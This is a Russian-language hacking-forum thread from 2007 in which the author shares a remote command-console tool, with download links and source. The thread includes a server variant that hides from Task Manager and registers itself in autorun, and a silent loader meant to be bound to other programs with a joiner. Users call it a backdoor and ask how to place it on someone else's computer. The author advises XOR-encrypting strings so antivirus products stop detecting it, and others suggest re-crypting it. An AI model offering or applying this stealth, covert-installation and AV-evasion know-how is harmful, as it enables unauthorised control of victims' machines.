Просмотр полной версии : Оцените мое творение
Joker-jar
03.05.2007, 19:01
Программа состоит из клиента и сервера, представляет собой удаленную консоль (терминальное управление компьютером). Выкладываю впервые. (Special For Antichat, как говорица :))
rmcn.zip (http://kbrdhook.com/downloads/rmcn.zip)
remcon.rar содержит клиент и сервер. Сервер без формы, легко завершается из диспетчера задач.
remcon_t.rar - вариант сервера, который не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой
taskkill /im remcon.exe /fа с автозагрузки убрать здесь: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\policies\Explorer\Run
Вид клиента:
http://www.kbrdhook.com/images/screenshots/remcon.jpg
Жду отзывов и предложений.
З.Ы. Скачать (http://kbrdhook.com/downloads/cmd.rar) расширенную справку по командам консоли Windows
идея неплохая лови +
тока вот с кодировкой там какой то косяк... вместо нормальных букв какие то буквы зю) поправь )
Joker-jar
09.06.2007, 01:52
Это косяк винды. Нужно создать reg файл с таким содержанием:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Nls\CodePage]
"1250"="c_1251.nls"
"1251"="c_1251.nls"
"1252"="c_1251.nls"
"1253"="c_1251.nls"
"1254"="c_1251.nls"
"1255"="c_1251.nls"
внести в реестр и все станет ОК.
З.Ы. Если что, смогу выложить исходники. Написано на Delphi +KOL
ок спасибо сделал как ты сказал - теперь все ок ) за за исходники будет отдельный респект ))) так что выкладывай
Alexsize
09.06.2007, 12:35
А исходники выложишь?
Joker-jar
09.06.2007, 14:36
Выложил исходники (все находится по ссылке в первом посту). Напоминаю, что написано на Delphi + KOL & MCK + WinSock2 (Есть в архиве).
Joker-jar
09.06.2007, 15:32
Хех... Добавил в архив еще один вариант сервера - не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой
taskkill /im remcon.exe /fа с автозагрузки убрать здесь: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\policies\Explorer\Run
Joker-jar
09.06.2007, 19:27
Интересно, как долго это все будет вдали от глаз антивирусов...
максимум неделю, если на вирустотал кидать никто не будет (сильно сомневаюсь :) ) возможно дольше
Joker-jar
10.06.2007, 10:47
На вирустотал кидать смысла нет, прогу проверило уже достаточное количество человек, доверять можно.
З.Ы. Нужно сканер диапазона сделать многопотоковым, а то медленный он сейчас
Joker-jar к сожелению твое творение спалил сегодня каспер и AntiVir,Avast,BitDefender,DrWeb,Ikarus,NOD32
-=lebed=-
15.06.2007, 15:27
Joker-jar к сожелению твое творение спалил сегодня каспер и AntiVir,Avast,BitDefender,DrWeb,Ikarus,NOD32
Наверно кто-то всётаки закачал на вирустотал, автор перекриптовывай своё творение...
Joker-jar
15.06.2007, 15:45
Нууу, программа с открытым кодом, думаю, кому надо, справятся ;)
Joker-jar
15.06.2007, 15:50
Кстати, на моей практике отучить каспера от домогательств удавалось путем шифрования строк программы банальным ксором (то есть вместо myfunc('строка') использовать myfunc(decrypt('зашифрованная строка'))). В частности, каспер перестал ругаться на одну мою библиотеку после того, как я убрал явно хранящуюся константу tm = 'maskmgr.exe'. Гы
Joker-jar
18.06.2007, 01:28
127.0.0.1 - соединено...
127.0.0.1 - отключено
127.0.0.1 - соединено...
LOL. Качай справку по командам командной строки (ссылка в первом посте). А еще, насколько я помню, по-умолчанию в полях прописан путь C:\ и команда dir. Не о чем это не говорило?
Сделал бы обычный Edit1.Text для ввода команд. На кой там ListBox не понимаю. Если бы там уже были забиты команды, то это да. Хотя пока её найдёшь, легче 100 раз напечатать будет.
Хорош Backdoor но такой медленый при скане
кокой там порт открывается?
Joker-jar
18.06.2007, 07:11
Порт 1666. Можно сканер сделать многопотоковым, хотя он в принципе не особо нужен. Думаю на неделе заняться новой версией
Joker-jar
18.06.2007, 09:27
Кнопку "послать" нажимал?
LeopardSS
18.06.2007, 11:18
А у меня глюк с кодировкой, абракодабра
А у меня глюк с кодировкой, абракодабра
там в архиве есть reg файл - два раза кликаешь по нему и заносишь данные в реестр. И все - кодировка норм. у меня тоже такое было.
Дайте примеры каких нибудь команд
ppc Вообще.
http://weppc.jino-net.ru/cmd.rar
тут ето...вопросик..
RemCon.exe на чужой комп надо один сливать или с Manager.dll
Joker-jar
19.06.2007, 03:33
тут ето...вопросик..
RemCon.exe на чужой комп надо один сливать или с Manager.dll
Если хочешь, чтоб не палился в диспетчере, то вместе с библиотекой.
У меня прога вообще не работает
У большинства работает, ищи проблему локально (фаервол, настройка сети и т.д.)
Joker-jar
02.08.2007, 08:24
http://ifolder.ru/2868078
RemCon Loader. При запуске выгружает RemCon.exe в папку C:\Windows\Web и запускает его. RemCon прописывается в реестре на автозагрузку и скрывает себя из диспетчера задач. При загрузке не выплевывает никаких окон, пригоден для склеивания джойнером. Написано в образовательных целях, использование в незаконных целях запрещено!
Joker-jar
02.08.2007, 08:25
Пароль на архив - antichat
_SploiT_
09.08.2007, 23:41
Спасибо программа классная, но только пришлось попариться с кодировкой (
А что там париться если Joker-jar сказал как исправить косяк
wedmak_ss
26.09.2007, 23:23
извините а как мне иконку на remconloader устанавит
Joker-jar
08.10.2007, 12:03
wedmak_ss, джойнь его с какой-нибудь прогой, большинство джойнеров и иконку позволяют указать.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot